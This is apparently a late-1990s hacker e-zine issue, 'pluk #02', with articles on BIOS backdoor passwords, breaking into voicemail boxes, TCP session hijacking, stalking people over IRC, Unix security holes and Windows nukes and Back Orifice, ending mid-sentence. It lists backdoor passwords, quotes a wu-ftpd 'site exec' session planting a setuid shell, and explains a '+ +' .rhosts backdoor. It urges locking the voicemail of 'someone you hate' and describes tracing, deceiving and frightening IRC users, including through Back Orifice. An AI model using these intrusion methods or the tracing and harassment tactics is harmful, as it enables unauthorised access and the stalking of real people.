=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ?¦..plan????anarchyyyyy=||the_futtttture?0’33žo+0_τ5 ?¦₯₯©΅λ??W33ΰ+3op!κ+κκκo||©΅λW33ΰ3ž!lkλW3x3ΰ3]!-+¦o ?¦₯₯©΅λW3??o3ΰ3ž!κ+κκκo!κ+||ΰ3žl+κκκo¦₯©΅λW313ΰ3+!κ+¦o ?¦¦₯©΅?₯λW>p?.===================================================.λW33ΰ3ž!κ+¦o ?¦¦₯©?₯λ>?l| >>pluk #02 |λW33rκκ3ž!¦ ?¦¦₯©΅??λ>a| >>http://www.pluk.cjb.net<< |λ+κκΰW33!κ¦ | || | >? - who said anything about the A-Team? ¦| | >? - yeahyeahyeah okokok || | >? ...pimpin ain't EZ!@! |3ΰ[| ?¦¦₯©΅λ₯W3?p?\___________________________________________________/λW33ΰ3!κ|k+¦o ?¦₯©΅₯λW3o??3ΰ3ž!κ+κκκo!κ+||ΰ3W!freκ!o¦₯©΅λW313ΰ3+!κ¦o ?¦₯©΅λ??W33₯ΰ+3op!κ+κκκo||©΅λW33?!3ΰ+κ¦[frκκk£v1n]¦o ?¦₯©΅?λ₯₯?3!κ+κκκo|λW3p3ΰ||₯©΅λW3n3ΰ3!¦₯©΅λW33ΰ[!+κ¦o ?¦??₯₯ž!κpolitical?W3o3ΰ€||₯©΅λW3NOΰ3e!κ!kj3kΰ3!κ+κ¦o ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± ± ± >> pluk 02 << ± ± ^^^^^^^ ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± Table (read life) Metal coloured shiny smooth Wide flat harsh table top Central curved feminine stand Operating table, medical table And on that table..... Man (read mankind) Flat out and naked Statuesque in stillness And magnificance Everyman And on that man.... Electrodes (read judgement) Wires metal insulated Patches attached Electrical impulses Lifesucking intensity And at the end of the wires.... Screen (read verdict) "fatal network error. Please try again." ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± >> Contents << ± ±=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=± ± Group / Site News..................................................pluk ± ± General News / Info................................................pluk ± ± BIOS Backdoor Passwords.......................................The Nommo ± ± HaXoring Meridian Mail..........................................mrsp00n ± ± A quick and dirty introduction to TCP/IP...........................squi ± ± Social Engineering / Stalking over IRC..........................despair ± ± Basic Security Concepts........................................insanity ± ± Nuking and other Windoesn't Security Problems.....................drag0 ± ± Egy kutya a kunyvtarba............................................Jιzus ± ± PLUK Hitlist.......................................................squi ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± HI. Hello, etc. Whew. Welcome to issue 02. Thanks to everyone who sent us articles/news/other neet stuff; we're always happy to get some kind of feedback. Thanks to (anon) for the opening poem "readme". --pluk >> Group / Site News << ^^^^^^^^^^^^^^^^^ + Sorry about the delay with pluk.net - we really need to get off our asses and do something about it. On Xoom, the site loads slower than old people fuck. If it all goes to plan, division will be hosting us on his box via a cable-modem connection. + We've added another loser [Philip Hardcastle] to our Loser List. We need more losers. Send us your losers. Word. >> General News / Info << ^^^^^^^^^^^^^^^^^^^ + Ever seen those bigass traffic cameras? The major design fault with early speed cameras was that they ran out of film, so they made digital cameras with SCSI hard drives inside. Although the actual size isn't known, the drive would have to be large enough to hold approximately 6 months worth of traffic photos. We obviously cannot condone the further (probably illegitimate) investigation into this, and it'd be pretty safe to assume the Department of Transport would be less than amused if you stole one of their cameras.. ;) + http://www.stand.org.uk/ - Adopt your MP. Fight government proposals to limit the use of encryption by educating them with the relevent information the spin- doctors fail to provide. Check out the site and adopt your MP. + Free Stuff!! Get yourname@penis.com email fwd @ http://getmail.penis.com ! ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± "WHAT FUCK!" lol "BOX NO BOOT!" ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± >> BIOS Backdoor passwords << ± ± >> by The Nommo [thenommo@mailcity.com] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± By now you should all know that BIOS passwords are not exactly top-security. BIOS password crackers are nice little utilities, and might be handy if you are luck enough to actually be inside the system, but how do you get inside it in the first place? Luckily, the stingy BIOS manufacturers have implemented backdoor passwords to save money when people phone up telling them that they've forgotten their password, so all they have to do is to type in these special codes, and they will get through the password screens and can change their old password. BIOS passwords will keep those honest people out but provide no protection against dishonest (I'd rather say curious) ones. Ahem. On to those <0D3z: I will only give you the most common manufacturers' backdoors, for others, have a search on the 'net. NB. These are all case sensitive, so type carefully. And when you're finished, don't change the original passwords for the user, that's plain lame... AMI Bios: --------- AMI AMI_SW AMI?SW A.M.I. BIOS HEWITT RAND LKWPETER PASSWORD 589589 (AmiBIOS 4.5x) AWARD: ------ 589589 589721 ALFAROME aLLy AWARD_SW AWARD_PW AWARD?SW awkward BIOSTAR j256 j262 HLT lkwpeter LKWPETER SER SKY_FOX Syxz <-Nice Others: ------- Phoenix also have backdoors - can't remember them off-hand. Can't remember what these work for, but try them out if desperate: condo, djonet, lkwpeter, biostar, biosstar IBM Aptiva's can be cleared by holding down both mouse buttons at boot-up until the computer boots. Toshiba laptops can bypass the password by holding down the left shift key during boot-up. If none of this works, on some computers, flooding the keyboard buffer will crash the password routine and allow the computer to boot. That means you keep hitting ESC at the password prompt. This may require 50 to 100 presses, and may not work in all machines, but its worked before, and is worth a try. The other method is to short the jumper on the motherboard by touching both the wires together for about 10 seconds. Some motherboards get damaged if you do this when it is on, so I suggest you do it with the computer turned off. Remove the jumper, turn the puter on, then if that fails then turn the computer on with the jumper in place. This will clear ALL the CMOS settings, so only do it when in dire need or when you know all the correct CMOS settings and have them written down. Better safe than sorry! From this, I hope you have learnt that BIOS passwords aren't exactly the safest thing in the world! If one person learns one thing from this article then I have done my job! ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± HaXoring Meridian Mail ± ± >> by mrsp00n [mrsp00n@phreaker.net] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± Ahhhhh....Voicemail. Want your own 31337 Voicemail Account? This issue, I'm going to be looking at getting a Voicemail box on Meridian Mail [0800 318 716]. The legitimate mailbox owner would call Meridian Mail and, at the voice prompt, enter their 6-digit mailbox number, followed by their "passcode" [These can be any length between 4 and 12 digits.] Once they have accessed their mailbox, they can hear any messages that have been left for them, change their options and/or send messages to other mailboxes. Now, when the mailboxes are created, the default passcode is the same as the box number. [Can you see where we’re going?] So, if you’ve got no life like me, you can [theoretically] stand in a phonebox and haXor away at the keypad till either: a) your fingers fall off, or b) you find an unused box Obviously, we’re aiming for the latter option... Another option would be to pick the box you want, and attempt to, uhm, "borrow" it from the rightful owner. Morally wrong? Yea, maybe, but you’re the 31337 όber-haXor, so morals don’t stand in your way, right? Damn straight. There are two basic ways to do this, without making it a life mission: a) know the person, and bring it up in conversation "So, uh, Meridian Mail.. you’ve got a mailbox there, right? Yea? What’s your passcode?" [Yea, I’m the Messiah of social-engineering..] b) take lucky guesses at the passcode. After all, you get 10 guesses at the passcode before the mailbox dies [it then has to be re-activated by the system manager.] So, try it on someone you hate, and if you don’t get their passcode, at least you’ve fucked their mailbox and caused them some hassle. If you *do* succeed in owning somone's box, then you can impress all your warez pup friends with your newly-discovered skillz! Seriously, though, dont abuse Meridian Mail for lame shit like that, because the boxes tend to be used for business, both legitimate and illegitimate. If you do it, keep your number quiet, and use it as a last resort, eh? [Although it’s pretty fuckin rare, you occasionally get boxes that can dial out to any number you want. So, since you’ve only dialled into an 0800 number, you get free phonecalls! w00p! Now you can d/l all your lesbian pr0n for free!] ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± A quick and dirty introduction to TCP ± ± >> by squi [squi@penis.com] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± TCP/IP/UDP/ICMP/etc.. the basic fibres of the world's networks. Quietly working away in the background, transparent to those who use them every day - yet so fundamental in the exchange of data, information, ideas, lesbian porn. But what the fuck are they? What do they do? How are they related? What are the security issues surrounding them? Why do pockets always get caught on door handles? I'll attempt to answer some TCP related questions in this issue. For now, let's start with with some definitions for the acronyms/abbreviations I'll be using. TCP - Transmission Control Protocol. IP - Internet Protocol. SVR_SEQ - Sequence number of the next byte to be sent by Roy. SVR_ACK - Next byte to be received by Roy (or the sequence number of the last byte received +1) SVR_WIND - Roy's receive window CLT_SEQ - Sequence number of the next byte to be sent by Bob CLT_ACK - Next byte to be received by the Bob CLT_WIND - Bob's receive window ROY - Our friendly and company-image-minded Dixons Ltd employee. Server. BOB - McDonalds caretaker, 3 stars, balding, good with kids. Client. See? Easy peasy. Imagine TCP/IP networking as a series of layered protocols - a base protocol on which the others sit whilst performing their respective functions. For TCP/ IP, the "stack" of protocols is based around IP. IP is the non-reliable, non- connection orientated protocol that sits at the bottom. Its function is simply to route the flow of data. It has 32-bit header fields which contain address information, and is generally the busiest protocol in the TCP/IP stack. There is no accountability for data thrown about by IP; for this, it relies on TCP... TCP provides a reliable, accountable connection between 2 entities. Every byte that is sent is marked with a sequence number of 32 bits, and is acknowledged (ACK) by the receiver using this previously assigned number. The sequence number for the first byte sent is computed during the connection opening. It changes for any new connection based on rules designed to avoid re- use of the same sequence number for two different sessions of a TCP connection. Initially, no data has been exchanged. Roy has none of Bob's porn. This means: SVR_SEQ = CLT_ACK and CLT_SEQ = SVR_ACK. These equations are also true when the connection is in a 'quiet' state (no porn being sent by either side). They are not true during states when data is sent. The more general equations look like this: CLT_ACK <= SVR_SEQ <= CLT_ACK + CLT_WIND SVR_ACK <= CLT_SEQ <= SVR_ACK + SVR_WIND Now, the TCP packet header fields are as follows: Source Port: The source port number Destination Port: The destination port number Sequence number: The sequence number of the first byte in this packet Acknowledgment Number: The expected sequence number of the next byte to be received Data Offset: Offset of the data in the packet Control Bits: URG: Urgent Pointer ACK: Acknowledgment PSH: Push Function RST: Reset the connection SYN: Synchronize sequence numbers FIN: No more data from sender Window: Window size of the sender Checksum: TCP checksum of the header and data Urgent Pointer: TCP urgent pointer Options: TCP options SEG_SEQ will refer to the packet sequence number (as seen in the header). SEG_ACK will refer to the packet acknowledgment number. SEG_FLAG will refer to the control bits. On a typical packet sent by Bob to Roy, SEG_SEQ is set to CLT_SEQ, SEG_ACK to CLT_ACK. Heard of the famous "3 way handshake"? It goes a little like this: Y0 R0y. Sup dude. Send me some data, I'm listenin' y0 b0b. Sup. here's muh data: "Gimme axS to j0r pr0n." sure dude, I ackn0wledge j00 wanna whack off, come on in. Something like that anyway. Maybe a little bit more complicated, but I really can't be bothered transcribing a whole metaphorical handshake using pr0npup- speak. Um. Yeah. Anyway. If we suppose that the Roy initiates the connection to Bob and that no data is exchanged, the normal packet exchange is as follows: * The connection on the client side (Roy) is on the CLOSED state. * The one on the server side (Bob) is on the LISTEN state. * Roy first sends his initial sequence number and sets the SYN bit, so: SEG_SEQ = CLT_SEQ_0, SEG_FLAG = SYN Its state is now "SYN-SENT". On receipt of this packet, Bob acknowledges Roy's sequence number, sends his own initial sequence number and sets the SYN bit: SEG_SEQ = SVR_SEQ_0, SEQ_ACK = CLT_SEQ_0+1, SEG_FLAG = SYN and set SVR_ACK=CLT_SEQ_0+1 Its state is now "SYN-RECEIVED". On receipt of this packet, Roy acknowledges Bob's sequence number: SEG_SEQ = CLT_SEQ_0+1, SEQ_ACK = SVR_SEQ_0+1 and sets "CLT_ACK=SVR_SEQ_0+1". Its state is now "ESTABLISHED". On receipt of this packet, Bob enters the "ESTABLISHED" state. We now have: CLT_SEQ = CLT_SEQ_0+1 CLT_ACK = SVR_SEQ_0+1 SVR_SEQ = SVR_SEQ_0+1 SVR_ACK = CLT_SEQ_0+1 Server (Bob) Client (Roy) LISTEN CLOSED <- SYN, CLT_SEQ_0 LISTEN SYN-SENT SYN, -> SVR_SEQ_0, CLT_SEQ_0+1 SYN-RECEIVED ESTABLISHED SVR_SEQ = CLT_SEQ_0 + 1 CLT_ACK = SVR_SEQ_0 + 1 <- ACK, CLT_SEQ_0 + 1 SVR_SEQ_0+1 ESTABLISHED SVR_SEQ = SVR_SEQ_0 + 1 SVR_ACK = CLT_SEQ_0 + 1 Nifty, huh? That's basically all there is to it. Bob can transfer his lesbian porn to Roy after an easy, split second TCP conversation. Security wise, there are many colourful ways to exploit TCP/IP - especially in the UNIX world where trust relationships between entities are common. TCP/IP can be fooled by hundreds of methods which are way beyond the scope of this article, although there are more simple and straightforward ways to bypass security such as skey or kerberos one time password/ticketing authentications. [EXAMPLE TIME. PHEER. ;) =] 8ή :\ :0] One such attack consists of creating a desynchronized state - simply the state of connection when both sides are in the ESTABLISHED state, & no data is being sent (stable state), and: SVR_SEQ != CLT_ACK CLT_SEQ != SVR_ACK This state connection, when existing on both sides of the TCP connection simply dictates that the two points cannot exchange data any longer. A third party host is then used to create acceptable packets for both ends which mimics the real packets. Now, let's assume that the connection is desynched, and Roy transmits a packet: SEG_SEQ = CLT_SEQ SEG_ACK = CLT_ACK Since CLT_SEQ != SVR_ACK, the data within Roy's packet will be rejected and the packet dropped. The third party then sends the SAME packet, but changes the SEG_SEQ and SEG_ACK (and also the checksum) so that: SEG_SEQ = SVR_ACK, SEG_ACK = SVR_SEQ Bob accepts this packet because ummm he just does, ok? The packet is acceptable and is processed accordingly. Now, if CLT_TO_SVR_OFFSET refers to SVR_ACK - CLT_SEQ and SVR_TO_CLT_OFFSET refers to CLT_ACK - SVR_SEQ, the first party attacker has to rewrite the TCP packet from the client to the server as: SEG_SEQ <- SEG_SEQ + CLT_TO_SVR_OFFSET SEG_ACK <- SEG_ACK - SVR_TO_CLT_OFFSET On the basis that the attacker can listen to any packet shifted through the conversation, and can forge any kind of IP packet (effectively masqing as the client OR the server), the whole process will behave as if the connection is actually routed through the attacking machine. Ninjitsu. HuYAH. Hyeeoorrr. Etc. Have a little think. You can now add or remove ANY data to this particular stream. Lovely. Penny dropped? For the less imaginative among you, take the rlogin via telnet scenario - the attacker can include any command which the server will assume to have been initiated by the client...think of the possibilities =] I realise I suck dick, and stuff in my article is probably ambiguous/boring and stuff; but if I got any of this wrong, or you want to point out how much my m0m blows, feel free to go die or something. Else mail me at squi@penis.com. ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± >> Social Engineering / Stalking over IRC << ± ± >> by despair [despair@mailcity.com] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± Hello. You don't know me...probably never will. It's not necessary. Who I am isn't important. Call me despair if you want. I just represent a group of people. The intellectual mafia let's call them. The intellectual mafia doesn't have any purpose as such....it just serves it's own purposes. I don't function for any reason other than to please myself. What I do is selfish, I admit that. Occasionally I'll do something for other people. Favours, things for friends. Otherwise what I do , I do to keep myself amused. To keep the wheels turning in my head. Otherwise I'd get very bored. I suppose I should tell you what I do. When I'm bored I fuck with people's heads. Before you start hating me, think about it. You do the same every day. I just do it more often and to people who...for the most part deserve it. Well, I think they deserve it, and I'm the only person I have to answer to. When people fuck with me, I fuck with their heads. Fair's fair. You piss me off. You get fucked in the head. Of course it works better the more ignorant the person is. Come up against another of the intellectual mafia and it's a very frustrating fight, but there are always ones to make up for that. Social Engineering is like sex. In order for it to be good you need a lot of foreplay. Bad social enigneers and sexual partners alike rush in without enough preparation. The key to fucking with people's heads is preparation. Work out a plan in advance. Think of the battle plan and try to imagine all eventualities. It's like a game of chess. Before you start fucking with someone's head...you've got to do some background digging..now in some cases this may be impossible...if they're on a dynamic IP for example and have no other distinguishing features...if so...you can always just go for a brute force out-argue/out-swear them. Now...comes the tasty bit.. if they have a fixed IP or at least an IP that you can find stuff about them from. Take for example an IP like this: ~user@ac3-3537.csv.shu.ac.uk Now....this is a jewel of an IP... you can see instantly that they go to an english university or academic institution. Now...that's all very well...BUT...you can learn more..you're just a few key- strokes and a browser away from knowing where they are: www.shu.ac.uk Bingo. Sheffield Hallam University...you know exactly where they are..then if you want to be even more clever...you'd try and figure out what course they're on by the csv. In this case..you can't find much out as to what it is. But in other cases it's very obvious what they're studying... ~hehe@ppgc20.ph.man.ac.uk Now...you'd deduce that this was someone studying physics at manchester university in england. Easy eh? Well I've done fun things with university students...like checking on their websites for their webmaster's email address...then pretending I'm female and at their university...then telling them to send me an explicit email with their room number (to their webmaster's address) and I'll come round and have sex with them.. Ok..so that's mean...he never came back on IRC...but he *was* pissing me off something wicked....kept on asking for cybersex and if I'd fuck him. I fucked him alright. Now...the challenging bit... Numeric IP addresses. Sometimes you can't do anything with them...but sometimes if you're lucky...you can...and then it's even more satisfying coz no-one else can figure out how you knew what you know.. Method 1: try the now-outdated NetBus or Back Orifice..if not on their IP..then the subnet that they're on..sometimes another computer will be infected and will have info on the network they're on...I've found out LOADS of info from one school once....all the teachers's and students' directories networked and through BO I could reel off a list of teachers' names to the kid I was fucking with. Method 2: more satisfying if it works. Shove IPs into your browser. the one you're trying to find first of all..then if that doesn't work...the ones at the beginning of the subnet: eg 194.168.91.167 you'd take a look at 194.168.91.1 then try 2, 3, etc In this case it won't work...but sometimes you'll get lucky and find the home - page of wherever they are. If that doesn't work....then try telnetting to their IP, then the IPs at the beginning of the subnet...often you'll find their mail server or something that'll give away the name of their organisation or school or whatever take this for example: 194.238.147.162 now....it won't resolve to a hostname.. BUT... try the beginning of the subnet 194.238.147.4 bingo...your victim goes to a school called Westminster. it's that simple... Then...just make up a law that they're breaking...or something like that...say you can see what they're doing...something to freak them out..fuck about. That's it be seeing you despair ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± >> Basic Security Concepts << ± ± >> by insanity [insanity@angelfire.com] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± Contents ======== <- Introduction -> <- Security holes/exploits -> --ftp ---Rhosts ---- New IP security hole. <- Identifies a UNIX password -> - The genuine article -- Shadowed <- Thanks to & News -> - People who have helped me, and whom I respect -- My future web page ---------------- <=Introduction=> ---------------- Well, here I am sitting in front of my computer again. This time I have decided to-do something constructive, like write my own text. So here I am. It occured to me I had to write my first text when I logged into the guest of koan.happyhacker.org account and saw so many people logged in. People who, like me, saw the user & pass on the net. It seemed to me that people would rather harass people on Ng's for the user & pass than test the many backdoors your system could have had. Newbies now-a-days seem to have less of a clue than newbies a few years ago, and definately a worse attitude. But anyway, me still being a newbie myself I thought I would share what I have learned. I'm sure most of the topics here will have been covered in numerous other texts, but I hope to add a new spin to what would be considered boring texts, So those of you 'elitests' who are offended by this look away now. The fact is this text has plenty of UNIX commands and stuff, and is based on the knowledge the user has a shell. This isnt configuring your logo.sys file. This is my first text so if anything is out of date etc give me a break :-). Please send all flames to kinetix@angelfire.com . ----------- ----- --- ----------- <= Security Holes and Exploits => ----------- ----- ---- ---------- I will do this from an admin's point of view to keep it official like. So please read between the lines. --> Ftp <-- So what's FTP? FTP stands for File Transfer Protocol. Ftp requests are answered by wuarchive's ftpd (usually). Versions below 2.2 of this daemon have a weakness through which you can execute any binary you can see with the 'site exec' command. [admin note] Anonymous FTP can be a valuable service if correctly configured and administered. FTP daemon sites should ensure that they are using the most recent version of their FTP daemon. (www.tucows.com?)The anonymous FTP root directory which is usually \/~ftp and each of its subdirectories should definately not be owned by the ftp account or be in the same group as the ftp account. This is probably the most common configuration problem. If any of these directories are owned by ftp or are in the same group as the ftp account and are not 'write protected' a hacker would easily be able to add files, such as a .rhosts file, (explained below) or modify other files. Many sites find it acceptable to use the root account. Making the ftp root directory and its subdirectories owned by root, part of the system group, and protected so that only root has write permission will help to keep your anonymous FTP service secure. So what's the exploit? A sample exploit (courtesy of a text by the voyager) of which you can execute a binary is shown below:- Login to the system via ftp: 220 uswest.com FTP server (Version wu-2.1(1) ready. Name (uswest.com:waltman): waltman 331 Password required for waltman. Password: jim 230 User waltman logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> quote "site exec cp /bin/sh /tmp/.tno" 200-cp /bin/sh /tmp/tno ftp> quote "site exec chmod 6755 /tmp/.tno" 200-chmod 6755 /tmp/tno ftp> quit 221 Goodbye. You see? Although there are not a lot of versions 2.1 around have a look. If I ever did look (which I didnt) through a couple of systems last Saturday I would have noticed more than one ftp system with this weakness. For more info on exploits look at www.rootshell.com which is currently re-organizing after it got hacked. -=> Rhosts <=- What are Rhosts? Lets take a look. On most (if not all) Unix machines, services such as Rsh and Rlogin used a simple authentication method based on hostnames that appear in .rhosts. So what's the back door/exploit? Well I learned this one from the BUGTRAQ mailing list. From a doc by some one called Christopher Claus. Someone could configure which machines do not need a pass to log onto them. A hacker that found himself inside a system with access to someone's rhosts file, they could add a '+ +' to the file and that would allow absolutely anyone to log into that account without a password. 'But why do this?' I hear you ask, 'Wouldn't that be easy to spot?' Well yes, but you'd be surprised how many well paid sysops don't check for this. A hacker always wants easy low key access to the computer he has 'penetrated'. Most hackers will use this method when NFS is exporting home directories. These accounts become backdoors for hackers. [note: Hackers will try to user rsh instead of rlogin because it doesnt have the same logging capablities.] It may be more sensible however, to make an account for yourself in the .rhosts file although these are sometimes also checked. -=> IP-Hole <=- Well here is a new hole that has recently been discussed on comp.security.misc When I go look into this hole further I am going to write a complete document on this subject. Right now I will just go into the Basic concepts. I have not tested this yet, and as I am NOT going into the complete tutorial style, you will have to read between the lines. This is the original message.. APath: zetnet.co.uk!peer.news.zetnet.net!demeter.clara.net!news.clara.net!news- lond.gip.net!news-peer.gip.net!news.gsl.net!gip.net!sunqbc.risq.qc.ca!news3. bellglobal.com!news1.bellglobal.com!news21.bellglobal.com.POSTED!not-for-mail From: chris@clal.ca (Chris Locke) Newsgroups: comp.security.misc,comp.security.unix Subject: IP Exposure (Proxy Etc.) Message-ID: <36a90c0c.31090889@news1.sympatico.ca> X-Newsreader: Forte Agent 1.5/32.451 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Lines: 24 Date: Sat, 23 Jan 1999 00:13:35 GMT NNTP-Posting-Host: 207.236.3.66 X-Trace: news21.bellglobal.com 917050293 207.236.3.66 (Fri, 22 Jan 1999 19:11:33 EDT) NNTP-Posting-Date: Fri, 22 Jan 1999 19:11:33 EDT Organization: Bell Solutions Xref: zetnet.co.uk comp.security.misc:51322 comp.security.unix:55422 A user at a client of mine recently discovered that forming an IP address as a 32 bit decimal number is valid. After I thought about it for a sec I figured that yeah, this is ok .. but I did not know that stacks would deal with an address in this form (supplied by the user). An example address would be 207.46.130.14 which converts to 3475931662. My Solaris, Linux and Win95 stations all work with these decimal address. (ie you can "ping 3475931662" ..) IOS 11.2 does not like these sorts of addresses at a console prompt ... (as an example of something that does not ..) (This example is bad ... but you can http to it ... ) The problem with this is that some services can be fooled by addresses in this form. An example would be a proxy with some kind of access list(s) on it. If it were written to blindly look at URL or dotted decimal addresses (and not be aware of the 32 bit decimal address) then it might pass the URL on .. Other exploits spring to mind .. Something to check out. Chris chris@clal.ca I hope you can see the exploit. Look out for the next guide. -=> UNIX PASSWORDS <=- Taken from an EXCELLENT unix password document by VoyaGer. The Shadowed Passwords.. Sample entry from /etc/shadow under System V release 4.0 will:5fg63fhD3d:8960:1:60:10:90:10000 Broken down, this shadow file line shows: Username: will Encrypted password: 5fg63fhD3d Last change: 8960 (Password was last changed on Minimum days: 1 (Password must be kept for 1 day without changing) Maximum days: 60 (Password must be changed every 60 days) Warning days: 10 (User receives 10 days warning of required password change) Inactivity days: 90 (Account disabled if not used for 90 days) Expiration date: 10000 (Account expires on The Genuine Article... The genuine article is broken down into sections.. Username Encrypted password (And optional password ageing data) User number Group Number GECOS Information Home directory Shell ] ] Sample entry from /etc/passwd: ] ] will:5fg63fhD3d:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] Broken down, this passwd file line shows: Username: will Encrypted password: 5fg63fhD3d User number: 9406 Group Number: 12 GECOS Information: Will Spencer Home directory: /home/fsg/will Shell: /bin/bash There was no point in me re-writing this, as it is consice and correct. -=> Thanks To <=- With special thanks to all those from alt.ph.uk and especially Zomba who always encouraged me, especially when I was on the brink of quitting :-( A word to all the newbies out there like me: When you get flamed, don't quit. Dont ask stupid questions but DONT QUIT. okokok - I think we need to be thanked for being so fucking lame that everyone else looks elite after us. Also, yeah; newbies. Don't ask dumbfuck questions. Learn how to search, read, and learn. THEN discuss and question, but if you're totally new to the scene, your best course of education is through textfiles, books, websites, etc. Check out the pluk links page, and/or these basic sites: * http://www.yahoo.com * http://www.insecure.org * http://www.textfiles.com * http://www.linux.org * http://www.eff.org Subscribe to newsgroups; alt.hacking, alt.phreaking and alt.ph.uk can be sort of informative at times. Don't expect an easy way into the scene; you can't expect people to teach you EVERYTHING, show some initiative. --squi ] -=> Web Page <=- My Web Page is currently http://welcome.to/digital.insanity I am going to add a 'docs by me' section. All flames should be directed kinetix@angelfire.com All constructive criticism send to insanity@angelfire.com ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± ± >> Nuking and other Windoesn't Security Problems << ± ± >> by drag0 [drag0@beer.com] << ± ±-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-± Ok, before I start, this ISN'T some lame-ass Winnuke manual. It's just the facts, and how to stop people pissing with your Windoesn't system. This includes the following ass-wipe programs: Back Orifice, Any OOB Nuker, Netbus, Deep Throat. All these tools, and more are generally used by lame warezpups, 10yr-old haX0r wannabe's, etc. IF YOU THINK ANY OF THE ABOVE TOOLS MAKE YOU ELITE, FUCK OFF NOW! Ok. Lets start with the Basics. Nuking. ( Read squi's article on TCP/IP before this one ;-). ) Nuking is a technique which involves exploiting a M$ bug ( yeah, another one ). Due to some sloppy-ass programming, Windows '95's TCP/IP stack can be crashed, by flooding the computer with random data through port 139. This is know as an 'OOB' nuke This results in your modem disconnecting from the ISP's router/digital modem, and can produce a BsoD (Blue Screen Of Death) or hang your system. The same can be done to Windows NT, as long as the installation is running either no service packs, or service pack 1 or 2. There are loads of ways of stopping people nuking you. The best one by far is to set up a linux firewall. Don't know what one is? Then why are you reading this? :-) A good example is BARF, provided with pluk01. If you haven't got the time / money to do this (like me) there are easier ways: 1 - For someone to nuke you they must know your IP. So don't go anywhere where someone can find it out!! This restricts you from IRC, ICQ etc, so it's the pants way out. 2 - Get a software firewall. These are programs which run on your computer, and only allow communications through certain ports. As the OOB nuke is only effective via port 139, this pretty much puts an end to any nuking. Try these; Conseal PC Firewall (http://www.signal9.com) Don't try these; Nukenabber ;) Haha NN - everyone know the Nukenabber exploits for NT4 (all service pack) work stations? Telnet to port 1024, let it timeout. This allegedly confuses the shit out of Nukenabber, and causes it to consume 90% CPU for around 30 seconds. Kinda lame, but there you go. I guess you warezpups aren't as safe as you first thought you were ;p --squi ======================= BO-Serve (Back Orifice) OK, as lame tools go, this is the best of them. It lets the 7yr old on AOL beat the fuck out of your computer. Not good. So, if you installed some kind of port -blocking firewall to combat people nuking you, its best to have it set up to only have ports you use open, rather than only having 139 closed. BO can be modified without any skill whatsoever to run through any port. So, closing 139 aint good enough. Witout any mods, it runs on port 31337. It also requires the existance of a server program on the targets PC. so, do a check to see if a file called \system\ .exe, yeah .exe. And no, windows doesnt like files with weird names like that. So, you're going to have to use your elite DOS skills to remove it. Once thats gone, noone can BO you unless it gets re-installed. Beware of what you are downloading, because lots of slightly dodgy programs can install the BO server without you noticing. If you DO find .exe in your System directory, you've been fucked over, anyone on the internet could have and probably has been munching your hard drives :) What BO can do to you: Allow anyone to access any data on your hard drive Edit your registry Open your hard drive up as an FTP server :) Hang / Restart your system Extract any Passwords in your password list file (*.PWL) which includes log-on passwords, dial up networking passwords, passwords to any secure areas on web sites etc. Run programs on your computer Close any programs you are currently running etc. (there are more, but these are the main ones) How to stop it: The easiest way, (this will stop 80% of BO attacks) is to close any access throught port 31337. However, you can never be sure this well render your system free from BO. The server can be made to run on any port, so unless you have an elite IP Forwarding system, (ideally with ipfwadm / BARF) you're pretty much sitting with your legs wide open. ====== Netbus Netbus started life as a weak BO clone, offering 1 or 2 new features, and 6 or 7 which BO already offered. If you press 